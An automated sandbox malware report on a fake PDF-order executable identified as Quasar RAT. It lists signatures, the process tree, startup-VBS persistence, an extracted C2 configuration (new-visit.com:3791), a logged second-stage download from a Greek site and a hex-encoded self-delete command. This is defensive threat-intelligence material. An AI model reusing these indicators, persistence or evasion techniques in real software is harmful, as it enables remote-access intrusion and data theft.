Windows Analysis Report
Order88983273293729387293828PDF.exe

Overview

General Information

Sample name: Order88983273293729387293828PDF.exe
Analysis ID: 1557393
MD5: abbfb2b5ebf6a24eef7269bde8e80640
SHA1: 99be0b33db303c353262f43d7c2e43a03b5e7b65
SHA256: 56bd84e77da1de080c2d5c42b6f101574e7146b200026ea9468703d742edec10
Tags:exeuser-lowmal3
Infos:

Detection

Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Order88983273293729387293828PDF.exe (PID: 180 cmdline: "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe" MD5: ABBFB2B5EBF6A24EEF7269BDE8E80640)
    • InstallUtil.exe (PID: 3624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 5352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MaxGeneration.exe (PID: 1344 cmdline: "C:\Users\user\AppData\Roaming\MaxGeneration.exe" MD5: ABBFB2B5EBF6A24EEF7269BDE8E80640)
      • InstallUtil.exe (PID: 3632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
{"Version": "1.4.1", "Host:Port": "new-visit.com:3791;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "StartupKey": "Quasar Client Startup", "LogDirectoryName": "Logs", "ServerSignature": "...", "ServerCertificate": "..."}
Source | Rule | Description | Author | Strings
00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.1884455692.0000000004C3E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
3.2.MaxGeneration.exe.4c82c50.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Order88983273293729387293828PDF.exe.6aa0000.12.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth | (listed below)
  • 0x28eed8:$x1: Quasar.Common.Messages
  • 0x29f201:$x1: Quasar.Common.Messages
  • 0x2ab81e:$x4: Uninstalling... good bye :-(
  • 0x2ad013:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...

                    System Summary

                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , ProcessId: 5352, ProcessName: wscript.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs" , ProcessId: 5352, ProcessName: wscript.exe

                    Data Obfuscation

                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-11-18T08:17:06.768317+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 72.11.156.80 | 3791 | 192.168.2.4 | 49731 | TCP
                    2024-11-18T08:17:06.768317+0100 | 2027619 | 1 | Domain Observed Used for C2 Detected | 72.11.156.80 | 3791 | 192.168.2.4 | 49731 | TCP

                    AV Detection

                    Source: 5.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "new-visit.com:3791;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "StartupKey": "Quasar Client Startup", "LogDirectoryName": "Logs", "ServerSignature": "...", "ServerCertificate": "..."}
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeReversingLabs: Detection: 31%
                    Source: Order88983273293729387293828PDF.exeReversingLabs: Detection: 31%
                    Source: Order88983273293729387293828PDF.exeVirustotal: Detection: 35%
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeJoe Sandbox ML: detected
                    Source: Order88983273293729387293828PDF.exeJoe Sandbox ML: detected
                    Source: Order88983273293729387293828PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
                    Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: Order88983273293729387293828PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp

                    Networking

                    Source: Network trafficSuricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 72.11.156.80:3791 -> 192.168.2.4:49731
                    Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 72.11.156.80:3791 -> 192.168.2.4:49731
                    Source: Malware configuration extractorURLs: new-visit.com
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 72.11.156.80:3791
                    Source: global trafficHTTP traffic detected: GET /slim/Wyaiccfynhd.mp3 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ipwho.is
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: www.oleonidas.gr
                    Source: global trafficDNS traffic detected: DNS query: new-visit.com
                    Source: global trafficDNS traffic detected: DNS query: ipwho.is
                    Source: InstallUtil.exe, 00000001.00000002.2917858184.0000000000B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: InstallUtil.exe, 00000001.00000002.2935903636.0000000005147000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://entityframework-plus.net/
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.isd
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/d
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: http://www.zzzprojects.com
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bulk-operations.net
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://bulk-operations.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mappingGMore
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://dapper-plus.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/)
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/include-graph).
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exception
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exceptionX
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://entityframework-extensions.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004EBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215VSELECT
                    Source: InstallUtil.exe, 00000001.00000002.2919597107.0000000002ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                    Source: Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drString found in binary or memory: https://linqtosql-plus.net/pricing.
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.000000000290C000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr/slim/Wyaiccfynhd.mp3
                    Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknown HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.4:49734 version: TLS 1.2

                    E-Banking Fraud

                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
